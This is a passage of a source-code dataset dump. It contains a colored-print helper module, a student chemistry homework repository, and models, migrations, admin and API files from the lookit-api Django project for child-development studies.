None or False for no tag\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(tag, *args) if tag else args\n blue(*args, add_datetime=add_datetime, prefix=prefix, sep=sep, end=end, file=file, closed_ok=closed_ok, **kwargs)\n\n\ndef timeout(*args, tag=timeout_tag, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Used to indicate the timeout of a process.\n\n Args:\n tag (any, optional): The tag that will be prepended to the print. None or False for no tag\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(tag, *args) if tag else args\n yellow(*args, add_datetime=add_datetime, prefix=prefix, sep=sep, end=end, file=file, closed_ok=closed_ok, **kwargs)\n\n\ndef warn(*args, tag=warn_tag, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Used to highlight that there may be an issue, or that code has improperly executed.\n\n Args:\n tag (any, optional): The tag that will be prepended to the print. None or False for no tag\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(tag, *args) if tag else args\n magenta(*args, add_datetime=add_datetime, prefix=prefix, sep=sep, end=end, file=file, closed_ok=closed_ok, **kwargs)\n\n\ndef error(*args, tag=error_tag, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Can be used to print the description or message associated with an exception.\n\n Args:\n tag (any, optional): The tag that will be prepended to the print. 
None or False for no tag\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(tag, *args) if tag else args\n red(*args, add_datetime=add_datetime, prefix=prefix, sep=sep, end=end, file=file, closed_ok=closed_ok, **kwargs)\n\n\nif __name__ == \"__main__\":\n pass\n" } ]
3
jtse9/chem160homework5
https://github.com/jtse9/chem160homework5
e9780ac0c22129c4ae9374fd2b5375c08183bcc6
d90a5d84cd642bc17be84fd742aea62e3c15e72a
bc1ac21c37a36322a40896f75ac4648b9d4d4996
refs/heads/master
2020-08-07T05:04:39.782566
2019-10-07T06:23:21
2019-10-07T06:23:21
213309570
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4906832277774811, "alphanum_fraction": 0.6055900454521179, "avg_line_length": 25.91666603088379, "blob_id": "3838026543f369c6f260cf542a020eae9440d5d5", "content_id": "b730b8ac44ee89d36f058ce0d7dc311052f8a030", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 322, "license_type": "no_license", "max_line_length": 56, "num_lines": 12, "path": "/molemass.py", "repo_name": "jtse9/chem160homework5", "src_encoding": "UTF-8", "text": "names=[\"H\", \"C\", \"N\", \"O\",\"P\",\"S\"]\nmasses=[1.008,12.0107,14.00674,15.9994,30.973761,32.066]\nDict={}\nfor i in range(len(names)):\n Dict[names[i]]=masses[i]\nMolec=input(\"Enter molecule string without spaces: \")\ndef molemass(x):\n mm = 0\n string=x\n alist=list(x)\n mm= sum([Dict[k] for k in alist])\n print (mm)" }, { "alpha_fraction": 0.6182212829589844, "alphanum_fraction": 0.6898047924041748, "avg_line_length": 27.875, "blob_id": "f8de746631b37d8c5720093bdd3ad3f56a24e3b8", "content_id": "68af819b9596f6c0d42095d6a7eb5f464f79a51f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 461, "license_type": "no_license", "max_line_length": 102, "num_lines": 16, "path": "/hyperc_np.py", "repo_name": "jtse9/chem160homework5", "src_encoding": "UTF-8", "text": "import math, time, random\nimport numpy as np\nntrials = 10000000\ndist = 0\nt = time.process_time()\n\nx1 = np.random.random(ntrials)\ny1 = np.random.random(ntrials)\nx2 = np.random.random(ntrials)\ny2 = np.random.random(ntrials)\ndist = np.mean(np.sqrt((x1-x2)**2+(y1-y2)**2))\n\ne_time=time.process_time()-t\n\nex_dist = 1/15*(math.sqrt(2)+2+5*math.log(1+math.sqrt(2)))\nprint(\"Ntrials=%d Ave dist=%9.7f Exact dist=%9.7f Elapsed time=%6.2f\"%(ntrials,dist,ex_dist,e_time))" } ]
2
joaoalves2010/lookit-api
https://github.com/joaoalves2010/lookit-api
391b40915fc843ffacd957d100b200990da19245
ee0ded40bae1c20d93a883dcd55561ffd69a932f
ce4d77f4aa4d615ef3736ddef61ff204631959d9
refs/heads/master
2021-01-20T10:29:34.037473
2017-05-16T18:16:28
2017-05-16T18:16:28
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6474609375, "alphanum_fraction": 0.650390625, "avg_line_length": 32.032257080078125, "blob_id": "bd8989b45fcd6d73db58e6d2c5115daa64873988", "content_id": "18a19b7f2f9eb721d9a397776a6e6fd8d26136d8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5120, "license_type": "permissive", "max_line_length": 131, "num_lines": 155, "path": "/studies/models.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "import uuid\n\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.utils.text import slugify\n\nfrom accounts.models import DemographicData, Organization, User\nfrom guardian.shortcuts import assign_perm\nfrom project.fields.datetime_aware_jsonfield import DateTimeAwareJSONField\nfrom transitions.extensions import GraphMachine as Machine\n\nfrom . import workflow\n\n\nclass Study(models.Model):\n uuid = models.UUIDField(default=uuid.uuid4)\n name = models.CharField(max_length=255, blank=False, null=False)\n short_description = models.TextField()\n long_description = models.TextField()\n criteria = models.TextField()\n duration = models.TextField()\n contact_info = models.TextField()\n image = models.ImageField(null=True)\n organization = models.ForeignKey(Organization, on_delete=models.DO_NOTHING, related_name='studies', related_query_name='study')\n blocks = DateTimeAwareJSONField(default=dict)\n state = models.CharField(choices=workflow.STATE_CHOICES, max_length=25, default=workflow.STATE_CHOICES[0][0])\n public = models.BooleanField(default=False)\n\n def __init__(self, *args, **kwargs):\n super(Study, self).__init__(*args, **kwargs)\n self.machine = Machine(\n self,\n states=workflow.states,\n transitions=workflow.transitions,\n initial=self.state,\n send_event=True,\n before_state_change='check_permission',\n after_state_change='_finalize_state_change'\n )\n\n def __str__(self):\n return f'<Study: {self.name}>'\n\n class Meta:\n permissions = (\n ('can_view', 'View Study'),\n ('can_edit', 'Edit Study'),\n ('can_submit', 'Submit Study'),\n ('can_respond', 'Can Respond'),\n )\n\n # WORKFLOW CALLBACKS\n def check_permission(self, ev):\n user = ev.kwargs.get('user')\n if user.is_superuser:\n return\n raise\n\n def notify_administrators_of_submission(self, ev):\n # TODO\n pass\n\n def notify_submitter_of_approval(self, ev):\n # TODO\n pass\n\n def notify_submitter_of_rejection(self, ev):\n # TODO\n pass\n\n def notify_administrators_of_retraction(self, ev):\n # TODO\n pass\n\n def notify_administrators_of_activation(self, ev):\n # TODO\n pass\n\n def notify_administrators_of_pause(self, ev):\n # TODO\n pass\n\n def notify_administrators_of_deactivation(self, ev):\n # TODO\n pass\n\n # Runs for every transition to log action\n def _log_action(self, ev):\n StudyLog.objects.create(action=ev.state.name, study=ev.model, user=ev.kwargs.get('user'))\n\n # Runs for every transition to save state and log action\n def _finalize_state_change(self, ev):\n ev.model.save()\n self._log_action(ev)\n\n# TODO Need a post_save hook for edit that pulls studies out of approved state\n# TODO or disallows editing in pre_save if they are approved\n\n@receiver(post_save, sender=Study)\ndef study_post_save(sender, **kwargs):\n \"\"\"\n Create groups for all newly created Study isntances. 
We only\n run on study creation to avoid having to check for existence\n on each call to Study.save.\n \"\"\"\n study, created = kwargs['instance'], kwargs['created']\n if created:\n from django.contrib.auth.models import Group\n for group in ['read', 'admin']:\n group_instance = Group.objects.create(name=f'{slugify(study.name)}-STUDY_{group}'.upper())\n for perm in Study._meta.permissions:\n # add only view permissions to non-admin\n if group == 'read' and perm != 'can_view':\n continue\n assign_perm(perm[0], group_instance, obj=study)\n\n\n\nclass Response(models.Model):\n study = models.ForeignKey(Study, on_delete=models.DO_NOTHING, related_name='responses')\n participant = models.ForeignKey(User, on_delete=models.DO_NOTHING)\n demographic_snapshot = models.ForeignKey(DemographicData, on_delete=models.DO_NOTHING)\n results = DateTimeAwareJSONField(default=dict)\n def __str__(self):\n return f'<Response: {self.study} {self.participant.get_short_name}>'\n\n class Meta:\n permissions = (\n ('view_response', 'View Response'),\n )\n\n\nclass Log(models.Model):\n created_at = models.DateTimeField(auto_now_add=True)\n user = models.ForeignKey(User, on_delete=models.DO_NOTHING)\n\n def __str__(self):\n return f'<{self.__class__.name}: {self.action} @ {self.created_at:%c}>'\n\n class Meta:\n abstract = True\n\n\nclass StudyLog(Log):\n action = models.CharField(max_length=128)\n study = models.ForeignKey(Study, on_delete=models.DO_NOTHING, related_name='logs', related_query_name='logs')\n\n def __str__(self):\n return f'<StudyLog: {self.action} on {self.study.name} at {self.created_at} by {self.user.username}'\n\n\nclass ResponseLog(Log):\n action = models.CharField(max_length=128)\n response = models.ForeignKey(Response, on_delete=models.DO_NOTHING)\n" }, { "alpha_fraction": 0.7474048733711243, "alphanum_fraction": 0.754325270652771, "avg_line_length": 25.272727966308594, "blob_id": "dd9eb18a1db29b7cb29740883262172130eac91a", "content_id": "96a3b2346687e2683d6955fd45513b85b3115c9d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 289, "license_type": "permissive", "max_line_length": 59, "num_lines": 11, "path": "/api/urls.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "from django.conf.urls import include, url\nfrom rest_framework.routers import DefaultRouter\n\nfrom api import views as api_views\n\nrouter = DefaultRouter()\nrouter.register(r'users', api_views.DemographicDataViewSet)\n\nurlpatterns = [\n url(r'^(?P<version>(v1|v2))/', include(router.urls))\n]\n" }, { "alpha_fraction": 0.8442906737327576, "alphanum_fraction": 0.8442906737327576, "avg_line_length": 31.11111068725586, "blob_id": "a77daedaf7eb77acfb3c33a4228a5e0a2d50d089", "content_id": "5c92d5ce3d0e52018d111aed5991bab3c4170cdf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 289, "license_type": "permissive", "max_line_length": 58, "num_lines": 9, "path": "/api/views.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "from rest_framework import viewsets\n\nfrom accounts.models import DemographicData\nfrom accounts.serializers import DemographicDataSerializer\n\n\nclass DemographicDataViewSet(viewsets.ModelViewSet):\n queryset = DemographicData.objects.all()\n serializer_class = DemographicDataSerializer\n" }, { "alpha_fraction": 0.5808170437812805, "alphanum_fraction": 0.6376554369926453, "avg_line_length": 25.809524536132812, "blob_id": 
"4588aff85847b6030161e9086d60ae07a7c35a36", "content_id": "dffae2621e818f4904f495f1516487b3c1ad2225", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 563, "license_type": "permissive", "max_line_length": 130, "num_lines": 21, "path": "/studies/migrations/0006_auto_20170426_1949.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11 on 2017-04-26 19:49\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('studies', '0005_auto_20170426_1741'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='response',\n name='study',\n field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, related_name='responses', to='studies.Study'),\n ),\n ]\n" }, { "alpha_fraction": 0.5535250306129456, "alphanum_fraction": 0.5915972590446472, "avg_line_length": 35.841583251953125, "blob_id": "f464d0b29638a44c03459d7963921fcfb5ec890a", "content_id": "3c8ea71e5579c4743d6ca5fd722ca6a51ec38da4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11163, "license_type": "permissive", "max_line_length": 123, "num_lines": 303, "path": "/accounts/models.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "import base64\nimport hashlib\nimport uuid\n\nfrom django.contrib.auth.base_user import AbstractBaseUser, BaseUserManager\nfrom django.contrib.auth.models import PermissionsMixin\nfrom django.contrib.postgres.fields.array import ArrayField\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.utils.html import mark_safe\nfrom django.utils.text import slugify\nfrom django.utils.translation import ugettext as _\n\nimport pydenticon\nfrom django_countries.fields import CountryField\nfrom guardian.mixins import GuardianUserMixin\nfrom guardian.shortcuts import get_objects_for_user\nfrom localflavor.us.models import USStateField\nfrom localflavor.us.us_states import USPS_CHOICES\nfrom project.fields.datetime_aware_jsonfield import DateTimeAwareJSONField\n\n\nclass UserManager(BaseUserManager):\n\n def create_user(self, username, password=None):\n if not username:\n raise ValueError('Users must have a username')\n\n user = self.model(\n username=self.normalize_email(username),\n is_active=True,\n )\n\n user.set_password(password)\n user.save(using=self._db)\n return user\n\n def create_superuser(self, username, password):\n user = self.create_user(username, password=password)\n user.is_superuser = True\n user.is_staff = True\n user.is_active = True\n user.save(using=self._db)\n return user\n\n\nclass Organization(models.Model):\n name = models.CharField(max_length=255, blank=False, null=False)\n url = models.URLField(verbose_name='Website')\n\n def __str__(self):\n return f'<Organization: {self.name}>'\n\n class Meta:\n permissions = (\n ('can_view', 'Can View'),\n ('can_edit', 'Can Edit'),\n ('can_create', 'Can Create'),\n ('can_remove', 'Can Remove'),\n )\n\n\n@receiver(post_save, sender=Organization)\ndef organization_post_save(sender, **kwargs):\n \"\"\"\n Create groups for all newly created Organization instances.\n We only run on Organization creation to avoid having to check\n existence on each call to Organization.save.\n \"\"\"\n organization, created = 
kwargs['instance'], kwargs['created']\n if created:\n from django.contrib.auth.models import Group\n from guardian.shortcuts import assign_perm\n for group in ['read', 'admin']:\n group_instance, created = Group.objects.get_or_create(name=f'{slugify(organization.name)}-ORG_{group}'.upper())\n for perm in Organization._meta.permissions:\n # add only view permissions to non-admin\n if group == 'read' and perm != 'can_view':\n continue\n assign_perm(perm[0], group_instance, obj=organization)\n\n\nclass User(AbstractBaseUser, PermissionsMixin, GuardianUserMixin):\n USERNAME_FIELD = EMAIL_FIELD = 'username'\n uuid = models.UUIDField(verbose_name='identifier', default=uuid.uuid4)\n username = models.EmailField(unique=True)\n given_name = models.CharField(max_length=255)\n middle_name = models.CharField(max_length=255, blank=True)\n family_name = models.CharField(max_length=255)\n organization = models.ForeignKey(Organization, on_delete=models.CASCADE,\n related_name='users', related_query_name='user', null=True, blank=True)\n _identicon = models.TextField(verbose_name='identicon')\n\n is_active = models.BooleanField(default=False)\n is_staff = models.BooleanField(default=False)\n\n @property\n def identicon(self):\n if not self._identicon:\n rbw = self._make_rainbow()\n generator = pydenticon.Generator(\n 5, 5, digest=hashlib.sha512, foreground=rbw, background='rgba(0,0,0,0)')\n png = generator.generate(str(self.uuid), 64, 64)\n b64_png = base64.b64encode(png)\n self._identicon = f'data:image/png;base64,{b64_png.decode()}'\n self.save()\n return self._identicon\n\n @property\n def identicon_html(self):\n return mark_safe(f'<img src=\"{str(self.identicon)}\" width=\"64\"/>')\n\n @property\n def is_participant(self):\n return self.demographics.exists()\n\n @property\n def studies(self):\n if not self.is_participant:\n return get_objects_for_user(self, ['studies.view_study', 'studies.edit_study'])\n return None\n\n def _make_rainbow(self):\n rbw = []\n for i in range(0, 255, 10):\n for j in range(0, 255, 10):\n for k in range(0, 255, 10):\n rbw.append(f'rgb({i},{j},{k})')\n return rbw\n\n def get_short_name(self):\n return self.uuid\n\n def get_full_name(self):\n return f'{self.given_name} {self.middle_name} {self.family_name}'\n\n def __str__(self):\n return f'<User: {self.uuid}>'\n\n objects = UserManager()\n\n class Meta:\n permissions = (\n ('can_create', 'Can Create'),\n ('can_view', 'Can View'),\n ('can_edit', 'Can Edit'),\n ('can_remove', 'Can Remove'),\n ('can_view_permissions', 'Can View Permissions'),\n ('can_edit_permissions', 'Can Edit Permissions'),\n )\n\n\nclass DemographicData(models.Model):\n RACE_CHOICES = (\n ('white', 'White'),\n ('hisp', 'Hispanic, Latino, or Spanish origin'),\n ('black', 'Black or African American'),\n ('asian', 'Asian'),\n ('native', 'American Indian or Alaska Native'),\n ('mideast-naf', 'Middle Eastern or North African'),\n ('hawaiian-pac-isl', 'Native Hawaiian or Other Pacific Islander'),\n ('other', 'Another race, ethnicity, or origin')\n )\n GENDER_CHOICES = (\n ('m', 'male'),\n ('f', 'female'),\n ('o', 'other'),\n ('na', 'prefer not to answer')\n )\n EDUCATION_CHOICES = (\n ('some', 'some or attending high school'),\n ('hs', 'high school diploma or GED'),\n ('col', 'some or attending college'),\n ('assoc', '2-year college degree'),\n ('bach', '4-year college degree'),\n ('grad', 'some or attending graduate or professional school'),\n ('prof', 'graduate or professional degree')\n )\n SPOUSE_EDUCATION_CHOICES = (\n ('some', 'some or attending high 
school'),\n ('hs', 'high school diploma or GED'),\n ('col', 'some or attending college'),\n ('assoc', '2-year college degree'),\n ('bach', '4-year college degree'),\n ('grad', 'some or attending graduate or professional school'),\n ('prof', 'graduate or professional degree'),\n ('na', 'not applicable - no spouse or partner')\n )\n NO_CHILDREN_CHOICES = (\n ('0', '0'),\n ('1', '1'),\n ('2', '2'),\n ('3', '3'),\n ('4', '4'),\n ('5', '5'),\n ('6', '6'),\n ('7', '7'),\n ('8', '8'),\n ('9', '9'),\n ('10', '10'),\n ('>10', 'More than 10')\n )\n AGE_CHOICES = (\n ('<18', 'under 18'),\n ('18-21', '18-21'),\n ('22-24', '22-24'),\n ('25-29', '25-29'),\n ('30-34', '30-34'),\n ('35-39', '35-39'),\n ('40-44', '40-44'),\n ('45-59', '45-49'),\n ('50s', '50-59'),\n ('60s', '60-69'),\n ('>70', '70 or over')\n )\n\n GUARDIAN_CHOICES = (\n ('1', '1'),\n ('2', '2'),\n ('3>', '3 or more'),\n ('varies', 'varies')\n )\n INCOME_CHOICES = (\n ('0', '0'),\n ('5000', '5000'),\n ('10000', '10000'),\n ('15000', '15000'),\n ('20000', '20000'),\n ('30000', '30000'),\n ('40000', '40000'),\n ('50000', '50000'),\n ('60000', '60000'),\n ('70000', '70000'),\n ('80000', '80000'),\n ('90000', '90000'),\n ('100000', '100000'),\n ('110000', '110000'),\n ('120000', '120000'),\n ('130000', '130000'),\n ('140000', '140000'),\n ('150000', '150000'),\n ('160000', '160000'),\n ('170000', '170000'),\n ('180000', '180000'),\n ('190000', '190000'),\n ('>200000', 'over 200000'),\n ('na', 'prefer not to answer')\n )\n DENSITY_CHOICES = (\n ('urban', 'urban'),\n ('suburban', 'suburban'),\n ('rural', 'rural')\n )\n user = models.ForeignKey(User, on_delete=models.CASCADE,\n related_name='demographics', related_query_name='demographics')\n created_at = models.DateTimeField(auto_now_add=True)\n previous = models.ForeignKey('self', on_delete=models.CASCADE, related_name='next_demographic_data',\n related_query_name='next_demographic_data', null=True, blank=True)\n\n number_of_children = models.CharField(choices=NO_CHILDREN_CHOICES, max_length=3)\n child_birthdays = ArrayField(models.DateField(), verbose_name='children\\'s birthdays')\n languages_spoken_at_home = models.TextField(verbose_name='languages spoken at home')\n number_of_guardians = models.CharField(choices=GUARDIAN_CHOICES, max_length=6)\n number_of_guardians_explanation = models.TextField()\n race_identification = models.CharField(max_length=16, choices=RACE_CHOICES)\n age = models.CharField(max_length=5, choices=AGE_CHOICES)\n gender = models.CharField(max_length=2, choices=GENDER_CHOICES)\n education_level = models.CharField(max_length=5, choices=EDUCATION_CHOICES)\n spouse_education_level = models.CharField(max_length=5, choices=SPOUSE_EDUCATION_CHOICES)\n annual_income = models.CharField(max_length=7, choices=INCOME_CHOICES)\n number_of_books = models.IntegerField()\n additional_comments = models.TextField()\n country = CountryField()\n state = USStateField(choices=('XX', _('Select a State')) + USPS_CHOICES[:])\n density = models.CharField(max_length=8, choices=DENSITY_CHOICES)\n extra = DateTimeAwareJSONField(null=True)\n\n def __str__(self):\n return f'<DemographicData: {self.user.get_short_name()} @ {self.created_at:%c}>'\n\n def to_display(self):\n return dict(\n user=self.user.uuid.hex,\n created_at=self.created_at.isoformat(),\n number_of_children=self.get_number_of_children_display(),\n child_birthdays=[birthday.isoformat() for birthday in self.child_birthdays],\n languages_spoken_at_home=self.languages_spoken_at_home,\n 
number_of_guardians=self.get_number_of_guardians_display(),\n number_of_guardians_explanation=self.number_of_guardians_explanation,\n race_identification=self.get_race_identification_display(),\n age=self.get_age_display(),\n gender=self.get_gender_display(),\n education_level=self.get_education_level_display(),\n spouse_education_level=self.get_spouse_education_level_display(),\n annual_income=self.get_annual_income_display(),\n number_of_books=self.number_of_books,\n additional_comments=self.additional_comments,\n country=str(self.country),\n state=self.get_state_display(),\n density=self.get_density_display(),\n extra=self.extra\n )\n" }, { "alpha_fraction": 0.5643044710159302, "alphanum_fraction": 0.6062992215156555, "avg_line_length": 28.30769157409668, "blob_id": "ddf2c6f0db874f35fd9f4c0babc41f9055301f94", "content_id": "29bf1350c8c007003e1bc5232cfd7b995991eda5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 762, "license_type": "permissive", "max_line_length": 168, "num_lines": 26, "path": "/studies/migrations/0009_auto_20170505_1605.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11 on 2017-05-05 16:05\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('studies', '0008_auto_20170505_1602'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='study',\n name='criteria',\n field=models.TextField(default='American bobtail savannah tiger norwegian forest manx maine coon but ragdoll. Mouser ragdoll. Turkish angora cornish rex.'),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='study',\n name='image',\n field=models.ImageField(null=True, upload_to=''),\n ),\n ]\n" }, { "alpha_fraction": 0.5697808265686035, "alphanum_fraction": 0.5940023064613342, "avg_line_length": 36.69565200805664, "blob_id": "54c7f329f41209a457624b4f4b4e639420b7d2b6", "content_id": "11e860e7a8e8f2854342fe969b5b03684ac0d8ed", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 867, "license_type": "permissive", "max_line_length": 250, "num_lines": 23, "path": "/accounts/migrations/0008_auto_20170516_1549.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.1 on 2017-05-16 15:49\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accounts', '0007_add_cos_admin_group_and_assign_perms'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='organization',\n options={'permissions': (('can_view', 'Can View'), ('can_edit', 'Can Edit'), ('can_create', 'Can Create'), ('can_remove', 'Can Remove'))},\n ),\n migrations.AlterModelOptions(\n name='user',\n options={'permissions': (('can_create', 'Can Create'), ('can_view', 'Can View'), ('can_edit', 'Can Edit'), ('can_remove', 'Can Remove'), ('can_view_permissions', 'Can View Permissions'), ('can_edit_permissions', 'Can Edit Permissions'))},\n ),\n ]\n" }, { "alpha_fraction": 0.8283898234367371, "alphanum_fraction": 0.8283898234367371, "avg_line_length": 21.4761905670166, "blob_id": "7eba287197c6b3eabdf2a05ea5dd64f5c6ac579a", "content_id": "e3dc85a9d1781219276b147b3c39a6c4fc5c6f6a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": 
"Python", "length_bytes": 472, "license_type": "permissive", "max_line_length": 58, "num_lines": 21, "path": "/accounts/admin.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "from django.contrib import admin\n\nfrom accounts.models import DemographicData, Organization\nfrom guardian.admin import GuardedModelAdmin\n\nfrom .models import User\n\n\nclass UserAdmin(GuardedModelAdmin):\n pass\n\nclass OrganizationAdmin(GuardedModelAdmin):\n pass\n\nclass DemographicDataAdmin(GuardedModelAdmin):\n pass\n\n\nadmin.site.register(User, UserAdmin)\nadmin.site.register(Organization, OrganizationAdmin)\nadmin.site.register(DemographicData, DemographicDataAdmin)\n" }, { "alpha_fraction": 0.6520993709564209, "alphanum_fraction": 0.6700942516326904, "avg_line_length": 30.54054069519043, "blob_id": "a91006f9552191e6474aab46c92eb16b4db28109", "content_id": "08117108b06a3371e271725b42d9db5d9ca30461", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1167, "license_type": "permissive", "max_line_length": 98, "num_lines": 37, "path": "/web/migrations/0001_create_initial_flatpages.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.1 on 2017-05-15 20:28\nfrom __future__ import unicode_literals\n\nfrom django.contrib.flatpages.models import FlatPage\nfrom django.contrib.sites.models import Site\nfrom django.db import migrations\n\nflatpages = [\n dict(url='/', title='Home', content='Home'),\n dict(url='/faq', title='FAQ', content='FAQ'),\n dict(url='/scientists', title='The Scientists', content='The Scientists'),\n dict(url='/resources', title='Resources', content='Resources'),\n dict(url='/contact', title='Contact Us', content='Contact Us'),\n]\n\n\ndef make_pages(*args, **kwargs):\n site, created = Site.objects.get_or_create(domain='example.com', defaults={'name': 'Example'})\n for page in flatpages:\n flatpage_obj, created = FlatPage.objects.get_or_create(**page)\n flatpage_obj.sites.add(site)\n\n\ndef unmake_pages(*args, **kwargs):\n FlatPage.objects.filter(url__in=[page['url'] for page in flatpages]).delete()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('studies', '0014_study_uuid'),\n ]\n\n operations = [\n migrations.RunPython(make_pages, reverse_code=unmake_pages)\n ]\n" }, { "alpha_fraction": 0.5843949317932129, "alphanum_fraction": 0.6353503465652466, "avg_line_length": 32.05263137817383, "blob_id": "95a7460aeceaed95a48bb686686c2e3e100d98cd", "content_id": "2c3589d052589d57add0318e111177234c4e8504", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 628, "license_type": "permissive", "max_line_length": 256, "num_lines": 19, "path": "/accounts/migrations/0005_auto_20170428_1814.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11 on 2017-04-28 18:14\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accounts', '0004_auto_20170427_1938'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='organization',\n options={'permissions': (('is_admin', 'Organization Administrator'), ('can_add_collaborators', 'Can Add Collaborators'), ('can_approve_studies', 'Can Approve Studies'), ('can_disable_studies', 'Can Disable Studies'), ('can_view', 'Can View'))},\n ),\n ]\n" }, { 
"alpha_fraction": 0.5805795788764954, "alphanum_fraction": 0.5879511833190918, "avg_line_length": 50.09090805053711, "blob_id": "bcfb732d019ccefc9e66e5fc887a660341ddd1c5", "content_id": "768d745f2475d4868760c158379c23089ba81722", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3934, "license_type": "permissive", "max_line_length": 350, "num_lines": 77, "path": "/studies/migrations/0001_initial.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11 on 2017-04-24 17:31\nfrom __future__ import unicode_literals\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport project.fields.datetime_aware_jsonfield\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('accounts', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Response',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('results', project.fields.datetime_aware_jsonfield.DateTimeAwareJSONField(default=dict)),\n ('demographic_snapshot', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.DemographicData')),\n ('participant', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'permissions': (('view_response', 'View Response'),),\n },\n ),\n migrations.CreateModel(\n name='ResponseLog',\n fields=[\n ('id', 